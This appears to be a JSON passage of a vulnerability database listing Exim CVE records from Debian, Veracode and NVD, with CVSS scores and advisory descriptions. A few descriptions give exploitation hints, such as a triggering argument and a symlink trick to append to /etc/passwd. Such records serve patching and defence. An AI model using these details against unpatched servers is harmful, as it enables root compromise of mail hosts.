"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28007", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 has Improper Neutralization 
of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28026", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28026", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. 
NOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28017", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28017", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. 
Local users can alter the behavior of root processes because a recipient address can have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28015", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T14:32:07", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "type": "debiancve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T14:29:00", "id": "DEBIANCVE:CVE-2019-10149", "href": "https://security-tracker.debian.org/tracker/CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:12:48", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2021-27216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2021-27216", "href": "https://security-tracker.debian.org/tracker/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T13:31:39", "description": "exim is vulnerable to denial of service. 
The vulnerability exists due to a Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:13:35", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-26T20:14:22", "id": "VERACODE:30369", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30369/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:07", "description": "exim4:buster is vulnerable to heap buffer overflow in queue_run().\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-05-04T22:33:31", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-10T20:47:38", "id": "VERACODE:30337", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30337/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to arbitrary code execution. A heap out-of-bounds write in `parse_fix_phrase()` allows an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:13:33", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-10T20:47:35", "id": "VERACODE:30368", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30368/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:49:08", "description": "exim4:buster is vulnerable to denial of service and other assorted attacks in Exim's spool directory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:32:47", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-10T22:47:37", "id": "VERACODE:30331", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30331/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:31:41", "description": "exim4 is vulnerable to arbitrary code execution. 
An integer overflow allows an attacker to execute arbitrary code on the host OS by leveraging on the mishandling of continuation lines during header-length restriction.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:15:21", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2021-09-03T18:46:50", "id": "VERACODE:30370", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30370/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists when `allow_filter` is true, using a missing close-on-exec flag for a privileged pipe. 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:35", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2022-07-13T12:56:24", "id": "VERACODE:30338", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30338/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T16:32:06", "description": "exim4:buster is vulnerable to an arbitrary file creation and clobbering.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-04T22:33:39", "type": "veracode", "title": "Arbitrary File Creation And Clobbering", "bulletinFamily": "software", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2022-07-13T12:54:22", "id": "VERACODE:30340", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30340/summary", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2022-07-26T13:31:40", "description": "exim4 is vulnerable to arbitrary code execution. A heap buffer underflow in `smtp_ungetc()` allows an attacker to execute arbitrary code on the host OS.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:34:08", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2020-28024"], "modified": "2021-05-10T18:47:31", "id": "VERACODE:30345", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30345/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:49:09", "description": "exim4 is vulnerable to privilege escalation. The vulnerability exists due to a boundary error within the main() function. A local user can trigger an out-of-bounds write and execute arbitrary code on the target system with elevated privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T22:33:42", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-05-10T20:47:38", "id": "VERACODE:30341", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30341/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-26T13:31:45", "description": "exim4:buster is vulnerable to Heap out-of-bounds read and write in extract_option().\n", 
VERACODE:30343, CVE-2020-28022, "Out-of-bounds Read And Write" (published 2021-05-04T22:34:02, modified 2021-05-10T18:47:31). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30343/summary

VERACODE:30344, CVE-2020-28023, "Information Disclosure" (published 2021-05-04T22:34:05, modified 2021-05-10T18:47:32). CVSS v3.1 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N); CVSS v2 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N). exim4 is vulnerable to information disclosure. The vulnerability exists due to a boundary condition in the smtp_setup_msg() function. A remote attacker can send a specially crafted message to the system, trigger an out-of-bounds read error and read the contents of memory on the system. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30344/summary

VERACODE:30336, CVE-2020-28017, "Arbitrary Code Execution" (published 2021-05-04T22:33:27, modified 2022-10-04T16:48:21). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). exim4 is vulnerable to arbitrary code execution. An integer overflow in `receive_add_recipient()` could potentially allow an attacker to execute arbitrary code on the host OS. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30336/summary

VERACODE:30335, CVE-2020-28015, "Privilege Escalation" (published 2021-05-04T22:33:26, modified 2021-05-10T20:47:35). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). exim4 is vulnerable to privilege escalation. The vulnerability exists due to a new-line injection into spool header files. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30335/summary

VERACODE:30339, CVE-2020-28013, "Arbitrary Code Execution" (published 2021-05-04T22:33:38, modified 2021-05-10T20:47:36). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). exim4 is vulnerable to arbitrary code execution. If a local attacker executes Exim with affected arguments such as `-F '.('`, a buffer overflow occurs in `parse_fix_phrase()` when it calls `strncpy()` with a -1 size, potentially allowing arbitrary code execution on the host OS. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30339/summary

VERACODE:30346, CVE-2020-28025, "Heap Out-of-bounds Read" (published 2021-05-04T22:34:09, modified 2021-05-10T18:47:31). CVSS v3.1 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N); CVSS v2 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N). exim4:buster is vulnerable to a heap out-of-bounds read in pdkim_finish_bodyhash(). Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30346/summary

VERACODE:30332, CVE-2020-28009, "Privilege Escalation" (published 2021-05-04T22:32:48, modified 2021-05-10T20:47:37). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). exim4 is vulnerable to privilege escalation. The vulnerability exists due to an integer overflow in get_stdinput(). Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30332/summary

VERACODE:30333, CVE-2020-28007, "Privilege Escalation" (published 2021-05-04T22:32:51, modified 2021-05-10T22:47:37). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). exim4 is vulnerable to privilege escalation. An attacker with the privileges of the exim user can create a symlink/hardlink in the log directory and append arbitrary contents to an arbitrary file such as `/etc/passwd` to obtain full root privileges. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30333/summary

VERACODE:30334, CVE-2020-28019, "Denial Of Service (DoS)" (published 2021-05-04T22:33:24, modified 2021-05-10T18:47:34). CVSS v3.1 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H); CVSS v2 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P). exim4:buster is vulnerable to denial of service. The vulnerability exists because of a failure to reset a function pointer after a BDAT error. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30334/summary

VERACODE:30342, CVE-2020-28026, "Arbitrary Code Execution" (published 2021-05-04T22:34:02, modified 2022-07-13T12:56:24). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). exim4 is vulnerable to arbitrary code execution. Line truncation and injection in `spool_read_header()` could potentially allow an attacker to execute arbitrary code on the host OS. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30342/summary

VERACODE:30347, CVE-2020-28021, "Privilege Escalation" (published 2021-05-04T22:34:22, modified 2021-05-10T18:47:33). CVSS v3.1 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C). exim4 is vulnerable to privilege escalation. The vulnerability exists due to insufficient validation of user-supplied input when processing new-line characters. A remote attacker can inject a new-line character into the spool header file and modify the mail queue. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30347/summary

VERACODE:30373, CVE-2021-27216, "Privilege Escalation" (published 2021-05-06T13:58:52, modified 2021-05-14T00:10:00). CVSS v3.1 6.3 MEDIUM (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H); CVSS v2 6.3 (AV:L/AC:M/Au:N/C:N/I:C/A:C). exim is vulnerable to privilege escalation. The vulnerability exists due to a race condition through which a user may delete arbitrary files. Reference: https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30373/summary

NVD CVE-2020-28019, CWE-665 (published 2021-05-06T13:15:00, modified 2021-05-10T17:01:00). CVSS v3.1 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H); CVSS v2 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P). Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28019

